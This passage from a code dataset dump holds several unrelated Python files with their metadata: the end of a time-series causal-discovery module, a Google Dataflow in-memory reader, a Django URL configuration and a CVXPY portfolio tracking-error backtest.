independencies and rank neighbors\n        \"\"\"\n        if self.verbose:\n            print(\"######################################\")\n            print(\"Skeleton Initialization\")\n            print(\"######################################\")\n\n        # p_list, q_list = np.where(np.triu(self.graph.edges) > 0)\n        p_list, q_list = np.where((np.triu(self.graph.edges)-np.diag(np.diag(self.graph.edges))) == 2)\n        print(self.graph.edges)\n        print(np.triu(self.graph.edges)-np.diag(np.diag(self.graph.edges)))\n        print(p_list, q_list)\n        res = Parallel(n_jobs=self.num_processor)(delayed(self._mi_pq)(p, q) for p, q in zip(p_list, q_list))\n\n        for pq in range(len(res)):\n            p, q, mi = res[pq][0], res[pq][1], res[pq][2]\n            self.mi_array[p, q] = mi\n            self.mi_array[q, p] = mi\n            if self.verbose:\n                print(\"p=\" + str(p) + \"; q=\" + str(q) + \"; I(p,q)=\" + \"{: 0.5f}\".format(self.mi_array[p, q]), end=\" \")\n            if self.p_value:\n                test = self.mi_array[p, q] > self.sig_lev\n            else:\n                test = self.mi_array[p, q] < self.alpha\n            if test:\n                if self.verbose:\n                    print(\"=> Remove link between \"+str(p)+\" and \"+str(q))\n                self.graph.edges[p, q] = 0\n                self.graph.edges[q, p] = 0\n            else:\n                if self.verbose:\n                    print()\n\n    def _cmi_sep_set_pq(self, p, q, set_size):\n        \"\"\"\n        estimate ctmi between two time series conditioned on each set of neighbors with cardinality equal to set_size\n        :param p: time series with index p\n        :param q: time series with index q\n        :param set_size: cardinality of the set of neighbors\n        :return: p, q, list of estimated values of ctmi(p,q,r_set), and list of all r_sets\n        \"\"\"\n        v_list = []\n        r_list = [r for r in range(self.graph.d) if (r != p) and (r != q) and ((\n                (self.graph.edges[r, p] == 2) and (self.gamma_matrix[self.names[p]].loc[self.names[r]] >= 0)) or (\n                (self.graph.edges[r, q] == 2) and (self.gamma_matrix[self.names[q]].loc[self.names[r]] >= 0)))]\n\n        r_list = [list(r) for r in itertools.combinations(r_list, set_size)]\n\n        r_list_temp = r_list.copy()\n        # if set_size == 1:\n        for rs in r_list_temp:\n            print(rs)\n            print(all(elem >= self.d for elem in rs))\n            if all(elem >= self.d for elem in rs):\n                r_list.remove(rs)\n        del r_list_temp\n\n        if self.adaptive_window:\n            x = window_representation(self.series[self.names[p]], windows_size=self.window_matrix[self.names[p]].loc[self.names[p]])\n            y = window_representation(self.series[self.names[q]], windows_size=self.window_matrix[self.names[q]].loc[self.names[q]])\n        else:\n            x = self.data_dict[self.names[p]]\n            y = self.data_dict[self.names[q]]\n\n        for rs in r_list:\n            z = dict()\n            for r in rs:\n                if self.adaptive_window:\n                    # select and drop NA\n                    z[self.names[r]] = self.series[self.names[r]].dropna()\n                else:\n                    z[self.names[r]] = self.data_dict[self.names[r]]\n            if self.graphical_optimization:\n                # cmi_pval, 
cmi_val = gctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n                #                          gamma_matrix=self.gamma_matrix, p_value=self.rank_using_p_value,\n                #                          graph=self.graph.edges)\n                cmi_pval, cmi_val = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n                                         gamma_matrix=self.gamma_matrix, graph=self.graph.edges,\n                                         p_value=self.rank_using_p_value, instantaneous_dict=self.instantaneous_dict)\n            else:\n                cmi_pval, cmi_val = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n                                         gamma_matrix=self.gamma_matrix, p_value=self.rank_using_p_value,\n                                         instantaneous_dict=self.instantaneous_dict)\n\n            if self.rank_using_p_value:\n                v_list.append(cmi_pval)\n            else:\n                v_list.append(cmi_val)\n        if v_list:\n            return p, q, v_list, r_list\n\n    def rank_cmi_sep_set_parallel(self, set_size):\n        \"\"\"\n        rank pairs of time series based on the estimation of ctmi between each pair of connected time series\n        :param set_size: cardinality of the set of neighbors\n        :return: ranking of each pair of connected time series based on ctmi\n        \"\"\"\n        list_adj, list_num_adj = self.graph.search_adj_all()\n        p_list = [p for p in range(len(list_num_adj)) if list_num_adj[p] > set_size]\n        print(p_list)\n        q_list = [list_adj[p] for p in p_list]\n        p_list = [p_list[p] for p in range(len(p_list)) for _ in q_list[p]]\n        q_list = [q for sublist in q_list for q in sublist]\n        pq_list = [(p, q) for p, q in zip(p_list, q_list)]\n        temp_pq = pq_list.copy()\n        temp_p = p_list.copy()\n        temp_q = q_list.copy()\n        for pq in range(len(temp_pq)):\n            if (temp_pq[pq][1], temp_pq[pq][0]) in pq_list:\n                pq_list.remove((temp_pq[pq][0], temp_pq[pq][1]))\n                p_list.remove(temp_p[pq])\n                q_list.remove(temp_q[pq])\n        del temp_pq, temp_p, temp_q\n        print(list_adj, list_num_adj)\n        print(p_list, q_list)\n        print(\"set_size \" +str(set_size))\n        # res = Parallel(n_jobs=self.num_processor)(delayed(self._cmi_sep_set_pq)(p, q, set_size) for p, q in\n        #                                           zip(p_list, q_list))\n        res = []\n        for p, q in zip(p_list, q_list):\n            res.append(self._cmi_sep_set_pq(p, q, set_size))\n\n        ranks = RankingList()\n        for pq in range(len(res)):\n            if res[pq] is not None:\n                if isinstance(res[pq][2], list):\n                    for r in range(len(res[pq][2])):\n                        ranks.add(res[pq][0], res[pq][1], res[pq][2][r], res[pq][3][r])\n                else:\n                    ranks.add(res[pq][0], res[pq][1], res[pq][2], res[pq][3])\n        if self.rank_using_p_value:\n            ranks.sort(descending=True)\n        else:\n            ranks.sort(descending=False)\n        return ranks\n\n    def find_sep_set(self):\n        \"\"\"\n        find the most contributing separation set (if it exists) between each pair of time series\n        \"\"\"\n        if self.verbose:\n            print(\"######################################\")\n            print(\"Skeleton Separation\")\n            print(\"######################################\")\n\n        print(\"max set size = \" + str(self.graph.d-1))\n        for set_size in range(1, self.graph.d-1):\n            ranks = self.rank_cmi_sep_set_parallel(set_size)\n            if self.verbose:\n                print(\"Ranking:\")\n                print(\"p: \"+str(ranks.elem_p))\n                print(\"q: \" + str(ranks.elem_q))\n                print(\"r: \" + str(ranks.elem_r))\n                print(\"val: \" + str(ranks.val))\n            for p, q, r_set, cmi in zip(ranks.elem_p, ranks.elem_q, ranks.elem_r, ranks.val):\n                test = (self.graph.edges[p, q] != 0)\n                for r in r_set:\n                    if not test:\n                        break\n                    test = test and ((self.graph.edges[q, r] != 0) or (self.graph.edges[p, r] != 0))\n                    # test = test and ((self.graph.sep[p, r, q] == 0) and (self.graph.sep[q, r, p] == 0))\n                if test:\n                    mi = self.mi_array[p, q]\n\n                    if self.p_value != self.rank_using_p_value:\n                        if self.adaptive_window:\n                            x = window_representation(self.series[self.names[p]],\n                                                      
windows_size=self.window_matrix[self.names[p]].loc[self.names[p]])\n y = window_representation(self.series[self.names[q]],\n windows_size=self.window_matrix[self.names[q]].loc[self.names[q]])\n else:\n x = self.data_dict[self.names[p]]\n y = self.data_dict[self.names[q]]\n\n z = dict()\n for r in r_set:\n if self.adaptive_window:\n # select and drop NA\n z[self.names[r]] = self.series[self.names[r]].dropna()\n else:\n z[self.names[r]] = self.data_dict[self.names[r]]\n if self.graphical_optimization:\n # cmi, _ = gctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n # gamma_matrix=self.gamma_matrix, p_value=self.p_value, graph=self.graph.edges)\n cmi_pval, cmi_val = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n gamma_matrix=self.gamma_matrix, graph=self.graph.edges,\n p_value=self.rank_using_p_value,\n instantaneous_dict=self.instantaneous_dict)\n else:\n cmi, _ = ctmi(x, y, z, self.names[p], self.names[q], self.sampling_rate,\n gamma_matrix=self.gamma_matrix, p_value=self.p_value,\n instantaneous_dict=self.instantaneous_dict)\n if self.verbose:\n print(\"p=\" + str(p) + \"; q=\" + str(q) + \"; r=\" + str(r_set) + \"; I(p,q|r)=\" + \"{: 0.5f}\".format(\n cmi) + \"; I(p,q)=\" + \"{: 0.5f}\".format(mi), end=\" \")\n\n if self.p_value:\n test = mi < self.sig_lev < cmi\n else:\n test = cmi < self.alpha\n if test:\n self.cmi_array[p, q] = cmi\n self.cmi_array[q, p] = cmi\n if self.verbose:\n print(\"=> remove link between \" + str(p) + \" and \" + str(q))\n self.graph.edges[p, q] = 0\n self.graph.edges[q, p] = 0\n\n for r in r_set:\n self.graph.add_sep(q, p, r)\n self.biggamma[p,q,r] = self.gamma_matrix[self.names[p]].loc[self.names[r]]\n self.biggamma[q,p,r] = self.gamma_matrix[self.names[q]].loc[self.names[r]]\n else:\n if self.verbose:\n print()\n # self._exclude_past()\n\n def fit2(self):\n \"\"\"\n run PCTMI\n :return: graph (CPDAG)\n \"\"\"\n if self.verbose:\n now = datetime.now()\n print(\"#######################################\")\n print(\"########### Starting KITMI ###########\")\n print(\"########### \" + now.strftime(\"%H:%M:%S\" + \" ###########\"))\n print(\"#######################################\")\n\n # initialize skeleton\n self.skeleton_initialize()\n\n # get separation sets\n self.find_sep_set()\n\n if self.verbose:\n print(\"######################################\")\n print(\"Final Results (KITMI)\")\n print(\"######################################\")\n print(\"Summary Graph:\")\n print(self.graph.edges)\n return self.graph.edges\n\n\nif __name__ == \"__main__\":\n from data.sim_data import generate_v_structure, generate_fork, diamond_generator, generate_mediator, mooij_7ts\n\n # data = generate_v_structure(2000)\n data = generate_fork(1000)\n # data, _, _ = diamond_generator(2000)\n # data.drop([data.columns[1]], axis=1, inplace=True)\n\n lag = 5\n # d = len(data.columns)\n\n n_iters = 1000\n hidden_size = 25 # d*(order-1)*2\n learning_rate = 0.01\n # input_size = 3\n\n # res = tskiko_mv(data, lag, learning_rate, n_iters, noise=True, alpha=0.05)\n res = nbcb_k(data, lag, learning_rate, n_iters, noise=True, alpha=0.05)\n print(res)\n # print(res['discovery'])\n\n # x = mts_order(data, order=order) #[:-order]\n # print(x.loc[2:5])\n # # y = mts_order(data[order+1:], order=order)\n # names_x = x.columns[:-d]\n # names_y = x.columns[-d:]\n # y = x[names_y]\n # x = x[names_x]\n # print(x.shape)\n # print(y.shape)\n", "sub_path": "baselines/scripts_python/python_packages/pwNBCBk/kitmi.py", "file_name": "kitmi.py", "file_ext": "py", 
"file_size_in_byte": 56359, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "torch.device", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 27, "usage_type": "attribute"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.tigramite.tigramite.independence_tests.CMIknn", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 62, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.tigramite.tigramite.independence_tests.ParCorr", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 90, "usage_type": "call"}, {"api_name": "torch.nn.Module", "line_number": 97, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 97, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 103, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 103, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 104, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 104, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 106, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 106, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 107, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 107, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 114, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 114, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 115, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 115, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 132, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 132, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 182, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 182, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 184, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 193, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 199, "usage_type": "attribute"}, {"api_name": "pandas.Series", "line_number": 201, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 228, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 268, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 268, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 270, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 270, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 274, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 284, "usage_type": "call"}, {"api_name": 
"torch.tensor", "line_number": 288, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 289, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 295, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 296, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 327, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 328, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 355, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 355, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 357, "usage_type": "call"}, {"api_name": "time.time", "line_number": 389, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 395, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 415, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 415, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 417, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 417, "usage_type": "attribute"}, {"api_name": "torch.nn.Module", "line_number": 425, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 425, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 431, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 431, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 432, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 432, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 434, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 434, "usage_type": "name"}, {"api_name": "torch.nn.Conv1d", "line_number": 435, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 435, "usage_type": "name"}, {"api_name": "torch.nn.ReLU", "line_number": 442, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 442, "usage_type": "name"}, {"api_name": "torch.nn.MaxPool1d", "line_number": 443, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 443, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 445, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 445, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 457, "usage_type": "call"}, {"api_name": "time.time", "line_number": 481, "usage_type": "call"}, {"api_name": "torch.nn.MSELoss", "line_number": 512, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 512, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 514, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 514, "usage_type": "name"}, {"api_name": "numpy.inf", "line_number": 518, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 524, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 528, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 529, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 532, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 533, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 569, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 572, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 572, "usage_type": "attribute"}, {"api_name": "torch.tensor", "line_number": 576, 
"usage_type": "call"}, {"api_name": "torch.float", "line_number": 576, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 600, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 600, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 602, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 602, "usage_type": "call"}, {"api_name": "time.time", "line_number": 633, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 639, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 639, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 667, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 668, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 692, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 693, "usage_type": "call"}, {"api_name": "numpy.intersect1d", "line_number": 694, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 715, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 716, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 717, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 727, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 728, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 729, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 736, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 738, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 743, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 744, "usage_type": "call"}, {"api_name": "numpy.take_along_axis", "line_number": 745, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.get_sampling_rate", "line_number": 810, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.get_alpha", "line_number": 813, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 819, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.align_matrix", "line_number": 826, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 828, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 830, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 831, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 856, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 860, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 863, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 894, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 894, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 905, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 906, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 921, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 998, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1021, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 1058, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 1060, "usage_type": "attribute"}, {"api_name": 
"datetime.datetime.now", "line_number": 1139, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1139, "usage_type": "name"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1165, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1166, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.tmi", "line_number": 1174, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 1191, "usage_type": "call"}, {"api_name": "numpy.triu", "line_number": 1191, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 1191, "usage_type": "call"}, {"api_name": "numpy.triu", "line_number": 1193, "usage_type": "call"}, {"api_name": "numpy.diag", "line_number": 1193, "usage_type": "call"}, {"api_name": "joblib.Parallel", "line_number": 1195, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 1195, "usage_type": "call"}, {"api_name": "itertools.combinations", "line_number": 1229, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1241, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1242, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1259, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1263, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1349, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi.window_representation", "line_number": 1351, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1367, "usage_type": "call"}, {"api_name": "baselines.scripts_python.python_packages.pwNBCBk.ctmi_new.ctmi", "line_number": 1372, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 1406, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 1406, "usage_type": "name"}, {"api_name": "data.sim_data", "line_number": 1431, "usage_type": "name"}, {"api_name": "data.sim_data.generate_fork", "line_number": 1431, "usage_type": "call"}, {"api_name": "data.sim_data", "line_number": 1444, "usage_type": "argument"}]} +{"seq_id": "461396696", "text": "# Copyright 2016 Google Inc. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"In-memory input source.\"\"\"\n\nimport itertools\n\nfrom google.cloud.dataflow import coders\nfrom google.cloud.dataflow.io import iobase\n\n\nclass InMemorySource(iobase.NativeSource):\n \"\"\"In-memory input source.\"\"\"\n\n def __init__(\n self, elements, coder=coders.Base64PickleCoder(), start_index=None,\n end_index=None):\n self.elements = elements\n self.coder = coder\n\n if start_index is None:\n self.start_index = 0\n else:\n self.start_index = start_index\n\n if end_index is None:\n self.end_index = len(elements)\n else:\n self.end_index = end_index\n\n def __eq__(self, other):\n return (self.elements == other.elements and\n self.coder == other.coder and\n self.start_index == other.start_index and\n self.end_index == other.end_index)\n\n def reader(self):\n return InMemoryReader(self)\n\n\nclass InMemoryReader(iobase.NativeSourceReader):\n \"\"\"A reader for in-memory source.\"\"\"\n\n def __init__(self, source):\n self.source = source\n\n # Index of the next item to be read by the InMemoryReader.\n # Starts at source.start_index.\n self.current_index = source.start_index\n\n def __enter__(self):\n return self\n\n def __exit__(self, exception_type, exception_value, traceback):\n pass\n\n def __iter__(self):\n for value in itertools.islice(self.source.elements,\n self.source.start_index,\n self.source.end_index):\n self.current_index += 1\n yield self.source.coder.decode(value)\n\n def get_progress(self):\n if (self.current_index >= self.source.end_index or\n self.source.start_index >= self.source.end_index):\n percent_complete = 1\n elif self.current_index == self.source.start_index:\n percent_complete = 0\n else:\n percent_complete = (\n float(self.current_index - self.source.start_index) / (\n self.source.end_index - self.source.start_index))\n\n return iobase.ReaderProgress(percent_complete=percent_complete)\n", "sub_path": "google/cloud/dataflow/worker/inmemory.py", "file_name": "inmemory.py", "file_ext": "py", "file_size_in_byte": 2620, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "google.cloud.dataflow.io.iobase.NativeSource", "line_number": 23, "usage_type": "attribute"}, {"api_name": "google.cloud.dataflow.io.iobase", "line_number": 23, "usage_type": "name"}, {"api_name": "google.cloud.dataflow.coders.Base64PickleCoder", "line_number": 27, "usage_type": "call"}, {"api_name": "google.cloud.dataflow.coders", "line_number": 27, "usage_type": "name"}, {"api_name": "google.cloud.dataflow.io.iobase.NativeSourceReader", "line_number": 52, "usage_type": "attribute"}, {"api_name": "google.cloud.dataflow.io.iobase", "line_number": 52, "usage_type": "name"}, {"api_name": "itertools.islice", "line_number": 69, "usage_type": "call"}, {"api_name": "google.cloud.dataflow.io.iobase.ReaderProgress", "line_number": 86, "usage_type": "call"}, {"api_name": "google.cloud.dataflow.io.iobase", "line_number": 86, "usage_type": "name"}]} 
+{"seq_id": "317494085", "text": "from django.conf.urls import url\n\nfrom . import views\n\napp_name = 'account'\nurlpatterns = [\n url(r'^$', views.show, name='show'),\n url(r'^save/$', views.save_list, name='save_list'),\n url(r'^import/$', views.import_page, name='import_page'),\n url(r'^import/submit$', views.import_csv, name='import_csv'),\n url(r'^export/$', views.export_csv, name='export_csv'),\n url(r'^customize/$', views.custom, name='customize'),\n url(r'^customize/(?P[0-9]+)/edit/$', views.edit, name='edit'),\n url(r'^customize/(?P[0-9]+)/edit/save$', views.edit_save, name='edit_save'),\n url(r'^customize/(?P[0-9]+)/remove/$', views.remove, name='remove'),\n url(r'^customize/(?P[0-9]+)/remove/confirm$', views.remove_confirm, name='remove_confirm'),\n] \n", "sub_path": "urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 795, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "django.conf.urls.url", "line_number": 7, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 8, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 9, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 10, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 11, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 12, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 13, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "4928489", "text": "# -*- coding: utf-8 -*-\n#%% NumPyの読み込み\nimport numpy as np\n# SciPyのstatsモジュールの読み込み\nimport scipy.stats as st\n# CVXPYの読み込み\nimport cvxpy as cvx\n# Pandasの読み込み\nimport pandas as pd\n# MatplotlibのPyplotモジュールの読み込み\nimport matplotlib.pyplot as plt\n# 日本語フォントの設定\nfrom matplotlib.font_manager import FontProperties\nimport sys\nif sys.platform.startswith('win'):\n FontPath = 'C:\\\\Windows\\\\Fonts\\\\meiryo.ttc'\nelif sys.platform.startswith('darwin'):\n FontPath = '/System/Library/Fonts/ヒラギノ角ゴシック W4.ttc'\nelif sys.platform.startswith('linux'):\n FontPath = '/usr/share/fonts/truetype/takao-gothic/TakaoPGothic.ttf'\njpfont = FontProperties(fname=FontPath)\n#%% 収益率データの読み込みとベンチマークの生成\nR = pd.read_csv('asset_return_data.csv', index_col=0)\n# R = R.asfreq(pd.infer_freq(R.index)) # この行は無視する\nT = R.shape[0]\nN = R.shape[1]\nnp.random.seed(8888)\nBenchmarkIndex = R.dot(np.tile(1.0/N, N)) + st.norm(0.0, 3.0).rvs(T)\n#%% トラッキングエラー最小化問題のバックテスト\nMovingWindow = 96\nBackTesting = T - MovingWindow\nV_Tracking = np.zeros(BackTesting)\nWeight = cvx.Variable(N)\nError = cvx.Variable(MovingWindow)\nTrackingError = cvx.sum_squares(Error)\nAsset_srT = R / np.sqrt(MovingWindow)\nIndex_srT = BenchmarkIndex / np.sqrt(MovingWindow)\nfor Month in range(0, BackTesting):\n Asset = Asset_srT.values[Month:(Month + MovingWindow), :]\n Index = Index_srT.values[Month:(Month + MovingWindow)]\n Min_TrackingError = cvx.Problem(cvx.Minimize(TrackingError),\n [Index - Asset @ Weight == Error,\n cvx.sum(Weight) == 1.0,\n Weight >= 0.0])\n Min_TrackingError.solve(solver=cvx.ECOS)\n V_Tracking[Month] = R.values[Month + MovingWindow, :].dot(Weight.value)\n#%% バックテストの結果のグラフ\nfig1 = plt.figure(1, facecolor='w')\nplt.plot(list(range(1, BackTesting + 1)), 
